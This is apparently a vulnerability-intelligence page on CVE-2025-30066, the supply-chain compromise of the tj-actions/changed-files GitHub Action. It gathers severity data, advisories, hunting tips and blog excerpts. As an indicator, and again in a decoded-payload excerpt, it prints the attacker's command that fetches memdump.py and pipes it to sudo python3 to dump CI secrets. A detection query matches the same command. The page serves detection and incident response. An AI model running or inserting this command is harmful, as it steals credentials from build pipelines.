CVE-2025-30066
published 2025-03-15CVE-2025-30066: tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on…
PriorityP186high8.6CVSS 3.1
AVNACLPRNUINSCCHINAN
KEVITW
CISA Known Exploited Vulnerabilitydue 2025-04-08
Exploited in the wild
EPSS
41.01%
98.5th percentile
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tj-actions | changed-files | <= 45.0.7 | — |
| tj-actions | changed-files | >= 0 < 46.0.1 | 46.0.1 |
| tj-actions | changed-files | >= 1 < 46 | 46 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0↗
sigma↗
dataSource.name = 'SentinelOne' and endpoint.os = 'linux' and event.type = 'Process Creation' and (tgt.process.name in:anycase ('curl') or tgt.process.displayName = 'curl') and tgt.process.cmdline contains '-sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3'- →Search workflow logs for double-encoded base64 strings within the 'changed-files' step output — presence indicates successful malicious payload execution ↗
- →Hunt for workflow runs referencing the malicious commit hash 0e58ed8 or the full SHA 0e58ed8671d6b60d0890c21b07f8835ace038e67 in GitHub Actions workflow files ↗
- →Audit CI/CD workflow logs from March 14–15, 2025 for outbound curl requests to gist.githubusercontent.com fetching memdump.py, indicating active exploitation ↗
- →Use GitHub code search to identify repositories in your org referencing tj-actions/changed-files: https://github.com/search?q=org:+tj-actions/changed-files&type=code ↗
- →Leaked secrets to look for in exposed workflow logs include AWS access keys, GitHub PATs (ghs_ prefix), npm tokens, and private RSA keys ↗
- →ghs_-prefixed GitHub tokens exposed in logs carry limited long-term risk as they expire within 24 hours or on workflow job completion; prioritize rotating other secret types ↗
- →Investigate the reviewdog/action-setup GitHub Action as a potential initial access vector that may have contributed to the compromise of tj-actions/changed-files ↗
- ·Only repositories using hash-pinned versions of tj-actions/changed-files were unaffected; all tag-based references (v1 through v45.0.7) were retroactively poisoned to point at the malicious commit ↗
- ·No external C2 exfiltration was observed; secrets were only dumped into workflow logs (double-encoded base64), meaning private repositories with non-public logs had limited exposure ↗
- ·Workflows that do not explicitly reference custom secrets (e.g., secrets.MYSECRET) are unlikely to have had sensitive secrets compromised ↗
- ·The GitHub Gist hosting memdump.py was taken down on March 15, 2025, and the compromised repository was restored; cached actions may still pose a residual risk ↗
CVSS provenance
nvdv3.18.6HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
vulncheck8.6HIGH
cisa8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
reviewdog/action-setup GitHub Action Embedded Malicious Code Vulnerability
cisa·2025-03-24·CVSS 8.6
CVE-2025-30154 [HIGH] CWE-506 reviewdog/action-setup GitHub Action Embedded Malicious Code Vulnerability
Vulnerability: reviewdog/action-setup GitHub Action Embedded Malicious Code Vulnerability
Affected: reviewdog action-setup GitHub Action
reviewdog action-setup GitHub Action contains an embedded malicious code vulnerability that dumps exposed secrets to Github Actions Workflow Logs.
Required Action: Apply mitigations as set forth in the CISA instructions linked below. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source project, third-party library, or a protocol used by different products. For more information, please see: CISA Mitigation Instructions: https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compr
CISA
tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
cisa·2025-03-18·CVSS 8.6
CVE-2025-30066 [HIGH] CWE-506 tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
Vulnerability: tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
Affected: tj-actions changed-files GitHub Action
tj-actions/changed-files GitHub Action contains an embedded malicious code vulnerability that allows a remote attacker to discover secrets by reading Github Actions Workflow Logs. These secrets may include, but are not limited to, valid AWS access keys, GitHub personal access tokens (PATs), npm tokens, and private RSA keys.
Required Action: Apply mitigations as set forth in the CISA instructions linked below. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source project, third-party l
GHSA
tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.
ghsa·2025-03-15
CVE-2025-30066 [HIGH] CWE-506 tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.
tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.
### Summary
A supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.
This has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).
### Details
The attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted se
VulnCheck
tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
vulncheck·2025·CVSS 8.6
CVE-2025-30066 [HIGH] CWE-506 tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
tj-actions/changed-files GitHub Action contains an embedded malicious code vulnerability that allows a remote attacker to discover secrets by reading Github Actions Workflow Logs. These secrets may include, but are not limited to, valid AWS access keys, GitHub personal access tokens (PATs), npm tokens, and private RSA keys.
Affected: tj-actions changed-files GitHub Action
Required Action: Apply mitigations as set forth in the CISA instructions linked below. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.stepsecurity.io/blog/harden-runner-detection-tj-action
No detection rules found.
No public exploits indexed.
Sentinelone
When Python Is Poisoned | How Runtime Security Stops the tj-actions Attack
blogs_sentinelone·2025-03-21
When Python Is Poisoned | How Runtime Security Stops the tj-actions Attack
tj-actions/changed-files
tj-actions/changed-files
This popular tool, integrated into over 23,000 software development projects, was exploited in a supply chain attack, potentially exposing sensitive credentials within build processes. This breach of trust could have allowed unauthorized access to critical systems and data, highlighting the increasing risks associated with the software supply chain and the need for robust security oversight.
## Anatomy of the Attack | A Wolf in Sheep’s Clothing
tj-actions/changed-files
0e58ed8671d6b60d0890c21b07f8835ace038e67
Base64 decoded code :
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":
Sentinelone
When Python Is Poisoned | How Runtime Security Stops the tj-actions Attack
blogs_sentinelone·2025-03-21·CVSS 8.6
[HIGH] When Python Is Poisoned | How Runtime Security Stops the tj-actions Attack
In the hyper-speed world of modern software development, Continuous Integration and Continuous Delivery (CI/CD) pipelines are the lifeblood of innovation. They are the automated arteries through which our code flows, transforming ideas into reality. But, what happens when a trusted component within this vital system goes rogue? On March 12, 2025, the developer community faced this nightmare as the widely adopted GitHub Action, `tj-actions/changed-files`, was compromised, exposing the hidden vulnerabilities lurking within our seemingly secure supply chains. This incident is also being tracked under CVE-2025-30066.
To put this into perspective, consider your organization’s critical digital infrastructure, built with layers of security. Now, imagine a widely-used and trusted software compone
Bleepingcomputer
Supply chain attack on popular GitHub Action exposes CI/CD secrets
blogs_bleepingcomputer·2025-03-17·CVSS 8.6
[HIGH] Supply chain attack on popular GitHub Action exposes CI/CD secrets
## Supply chain attack on popular GitHub Action exposes CI/CD secrets
## Bill Toulas
A supply chain attack on the widely used 'tj-actions/changed-files' GitHub Action, used by 23,000 repositories, potentially allowed threat actors to steal CI/CD secrets from GitHub Actions build logs.
The GitHub Action is a very popular automation tool designed for GitHub Actions workflows. It allows developers to identify files changed in a pull request or commit and take actions based on those changes, generally used in testing, workflow triggering, and automated code linting and validation.
As first reported by StepSecurity , attackers added a malicious commit to the tool on March 14, 2025, at 4:00 PM UTC, that dumped CI/CD secrets from the Runner Worker process to the repository of any projects usi
Wiz
GitHub Action tj-actions/changed-files supply chain attack | Wiz Blog
blogs_wiz·2025-03-15·CVSS 8.6
CVE-2025-30066 [HIGH] GitHub Action tj-actions/changed-files supply chain attack | Wiz Blog
March 17, 2025 update: Wiz Threat Research has identified another compromised GitHub Action called `reviewdog/action-setup`, that may have contributed to the compromise of `tj-actions/changed-files`.
# TL;DR
- As first reported by Step Security, the widely used GitHub Action `tj-actions/changed-files` was compromised sometime before March 14, 2025 with a malicious payload that caused affected public repositories to leak their secrets in logs. The compromise is also being tracked as a vulnerability, and has been assigned CVE-2025-30066.
- We don't yet know how exactly this happened, who is behind this, or what their specific goals were (edit: the tj-actions maintainers have since stated that the attacker somehow compromised a GitHub personal access token (PAT) used by a bot with access to
Wiz
GitHub Action tj-actions/changed-files supply chain attack | Wiz Blog
blogs_wiz·2025-03-15
GitHub Action tj-actions/changed-files supply chain attack | Wiz Blog
reviewdog/action-setup
tj-actions/changed-files
## TL;DR
tj-actions/changed-files
We don't yet know how exactly this happened, who is behind this, or what their specific goals were (edit: the tj-actions maintainers have since stated that the attacker somehow compromised a GitHub personal access token (PAT) used by a bot with access to the repo).
tj-actions/changed-files
Immediate response therefore remains necessary to mitigate the risk of credential theft and CI pipeline compromise. However, the primary risk is to public repositories , where secrets dumped into workflow logs are public as well; conversely, the risk to private repos is limited.
Wiz Threat Research has observed first-hand the deployment of the script designed to dump secrets as part of the malicious payload's executi
arXiv
LLM Embedding-based Attribution (LEA): Quantifying Source Contributions to Generative Model's Response for Vulnerability Analysis
arxiv_fulltext·2025-09-03
LLM Embedding-based Attribution (LEA): Quantifying Source Contributions to Generative Model's Response for Vulnerability Analysis
LLM Embedding-based Attribution (LEA): Quantifying Source Contributions to Generative Model's Response for Vulnerability Analysis
Reza Fayyazi
Rochester Institute of Technology
Michael Zuzak
Rochester Institute of Technology
Shanchieh Jay Yang
Gonzaga University
## Abstract
Large Language Models (LLMs) are increasingly used for cybersecurity threat analysis, but their deployment in security-sensitive environments raises trust and safety concerns. With over 21,000 vulnerabilities disclosed in 2025, manual analysis is infeasible, making scalable and verifiable AI support critical. When querying LLMs, dealing with emerging vulnerabilities is challenging as they have a training cut-off date. While Retrieval-Augmented Generation (RAG) can inject up-to-date context to alleviate the cut-o
https://blog.gitguardian.com/compromised-tj-actions/https://github.com/chains-project/maven-lockfile/pull/1111https://github.com/espressif/arduino-esp32/issues/11127https://github.com/github/docs/blob/962a1c8dccb8c0f66548b324e5b921b5e4fbc3d6/content/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions.md?plain=1#L191-L193https://github.com/modal-labs/modal-examples/issues/1100https://github.com/rackerlabs/genestack/pull/903https://github.com/tj-actions/changed-files/blob/45fb12d7a8bedb4da42342e52fe054c6c2c3fd73/README.md?plain=1#L20-L28https://github.com/tj-actions/changed-files/issues/2463https://github.com/tj-actions/changed-files/issues/2464https://github.com/tj-actions/changed-files/issues/2477https://news.ycombinator.com/item?id=43367987https://news.ycombinator.com/item?id=43368870https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised/https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066/https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromisedhttps://www.stream.security/post/github-action-supply-chain-attack-exposes-secrets-what-you-need-to-know-and-how-to-respondhttps://www.sweet.security/blog/cve-2025-30066-tj-actions-supply-chain-attackhttps://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-30066
2025-03-15
Published
2025-03-18
Added to CISA KEV
Exploited in the wild